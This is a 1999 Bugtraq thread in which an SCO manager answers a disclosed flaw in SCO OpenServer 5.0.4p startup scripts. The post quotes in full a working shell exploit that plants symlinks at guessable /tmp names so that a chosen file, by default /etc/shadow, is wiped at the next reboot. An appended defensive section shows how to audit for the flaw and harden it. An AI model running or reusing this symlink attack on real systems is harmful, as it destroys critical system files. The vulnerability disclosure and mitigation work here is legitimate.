[9830] in bugtraq
Re: Little exploit for startup scripts (SCO 5.0.4p).
daemon@ATHENA.MIT.EDU (Jon Coyle)
Mon Mar 8 12:24:29 1999
Date: Mon, 8 Mar 1999 11:58:54 -0000
Reply-To: jonco@SCO.com
From: Jon Coyle <jonco@SCO.COM>
X-To: leshka <leshka@leshka.chuvashia.su>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <AAxlcusyk3@leshka.chuvashia.su>
Leshka,
We have started work on this and are checking all of our OS
products to see if they suffer from similar problems. We will
make information available at our security pages (http://www.sco.com/security)
on how to work around the problem, and will also have fixes available in a few days.
Thanks,
Jon
> -----Original Message-----
> From: Bugtraq List [mailto:BUGTRAQ@netspace.org]On Behalf Of leshka
> Sent: 07 March 1999 12:07
> To: BUGTRAQ@netspace.org
> Subject: Little exploit for startup scripts (SCO 5.0.4p).
>
>
> #!/bin/sh
> #
> # ... The punishment for inobedience ...
> # (Cycle # 2)
> #
> # This simple script can help to erase any file
> # (SCO OpenServer Enterprise System v 5.0.4p).
> # Have fun !
> #
> #
> #
> #
> # Some of "/etc/rc2.d" startup scripts create and then delete temporary files
> # with easily predictable names in "/tmp" directory. Below there are a few
> # interesting fragments of those nice scripts:
> #
> # S84rpcinit:
> # ...
> # /bin/su root -c "/bin/ps -ef" > /tmp/rpc$$ 2>/tmp/rpc.err$$
> # /bin/rm -f /tmp/rpc.err$$
> # ...
> # rm -rf /tmp/rpc$$
> #
> # S95nis:
> # ...
> # /bin/su root -c "/bin/ps -ef" > /tmp/nis$$ 2>/tmp/nis.err$$
> # /bin/rm -f /tmp/nis.err$$
> # ...
> # rm -f /tmp/nis$$
> #
> # S85tcp:
> # ...
> # /bin/su root -c "/bin/ps -ef" > /tmp/tps$$ 2>/tmp/ps.err$$
> # /bin/rm -f /tmp/ps.err$$
> # ...
> # /bin/rm -f /tmp/tps$$
> #
> # S89nfs:
> # ...
> # /bin/su root -c "/bin/ps -ef" > /tmp/nfs$$ 2>/tmp/nfs.err$$
> # /bin/rm -f /tmp/nfs.err$$
> # ...
> # rm -f /tmp/nfs$$
> #
> # Every time during the startup such shell scripts create files with names
> # that include a process number of the above shell script. My numerous tests
> # showed that the number is always the same with every reboot. Pretty good,
> # isn't it? One problem: how to determine the process number of such script?
> # It's so simple! Child processes of this script have PID's with values
> # slightly above the parent's PID. A little math and one gets it. Next
> # step is creating a few symbolic links to the victim file in the "/tmp"
> # directory. During the next startup the victim file will be destroyed.
> #
> # P.S. Looking forward to getting published a complete SCO's list of names
> # of such perfect shell scripts.
> #
> # 999,99*2
> #
> # ----------------------
> # ---------------------------------------------
> # ----------------- Dedicated to my beautiful lady ------------------
> # ---------------------------------------------
> # ----------------------
> #
> # Leshka Zakharoff, 1999. E-mail: leshka@leshka.chuvashia.su (.ru)
> #
> #
> #
> if [ _$1 = "_" ]
> then
>     {
>         echo -n "File to delete [/etc/shadow]:"
>         read victim_file
>         if [ _$victim_file = "_" ]
>         then
>             victim_file="/etc/shadow"
>         fi
>     }
> else
>     victim_file=$1
> fi
> pid=`/bin/ps -ef|/bin/grep -v awk|/usr/bin/awk '/inetd/ { printf $2 }'`
> lastpid=`expr $pid - 30`
> while [ $pid != $lastpid ]
> do
>     pid=`expr $pid - 1`;ln -fs /etc/shadow /tmp/tps$pid
> done
> echo Done ! File \"$victim_file\" will be destroyed after the next reboot.
>
----
Jon Coyle - Manager, Internet Engineering & Secure Technologies
jonco@sco.com SCO Ltd.
Tel : +44 1923 813656 Croxley Business Park
Fax: +44 1923 813804 Hatters Lane
http://www.sco.com Watford, WD1 8YN, UK
Fingerprint: F44A 677A 4920 02AC C655 D419 B9B7 46B0 A951 6FF7
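The rc fragments quoted in the thread share one fix: stop writing through a guessable /tmp/<name>$$ path. The following is an added example, not code from this thread or from SCO; it assumes a POSIX sh with mktemp(1) (which SCO OpenServer of that era may not ship), and the rc fragment it scans is a constructed copy of the quoted S84rpcinit lines.

```sh
# Added example, not code from this thread or from SCO: audit helper and a
# hardened form of the "/tmp/<name>$$" pattern. Assumes POSIX sh + mktemp(1).
# make_sample_rc writes a constructed copy of the quoted S84rpcinit fragment.
make_sample_rc() {
    f=$(mktemp) || return 1
    cat > "$f" <<'EOF'
#!/bin/sh
/bin/su root -c "/bin/ps -ef" > /tmp/rpc$$ 2>/tmp/rpc.err$$
/bin/rm -f /tmp/rpc.err$$
rm -rf /tmp/rpc$$
EOF
    echo "$f"
}

# Audit: count lines redirecting into /tmp/<name>$$, a path any local user
# can pre-create as a link before the next boot.
count_predictable_tmp() {
    grep -c '[>][> ]*/tmp/[A-Za-z0-9._-]*\$\$' "$1"
}

# Why it matters: a redirect follows a link found at the path and truncates
# the link target. Returns 0 when the target was emptied.
redirect_follows_symlink() {
    box=$(mktemp -d) || return 1
    echo secret > "$box/target"
    ln -s "$box/target" "$box/rpc123"   # stands in for a planted /tmp/rpc$$
    : > "$box/rpc123"                   # what "> /tmp/rpc$$" does at boot
    [ ! -s "$box/target" ]; r=$?
    rm -rf "$box"
    return $r
}

# Hardened form: private 0700 directory with a random name. mkdir(2) fails on
# an existing path rather than following it; the random suffix defeats guessing.
ps_snapshot() {
    umask 077
    dir=$(mktemp -d "${TMPDIR:-/tmp}/rpcinit.XXXXXX") || return 1
    ps -ef > "$dir/ps.out" 2> "$dir/ps.err"; r=$?   # script reads ps.out here
    rm -rf "$dir"
    return $r
}

# The property ps_snapshot relies on, shown directly (returns 0 on refusal).
mkdir_refuses_symlink() {
    box=$(mktemp -d) || return 1
    ln -s "$box/target" "$box/planted"
    if mkdir "$box/planted" 2>/dev/null; then r=1; else r=0; fi
    rm -rf "$box"
    return $r
}
```

Running count_predictable_tmp over the real /etc/rc2.d scripts is the quick way to find every script on the post's wished-for list; ps_snapshot sets umask for the calling shell, as an rc script would expect.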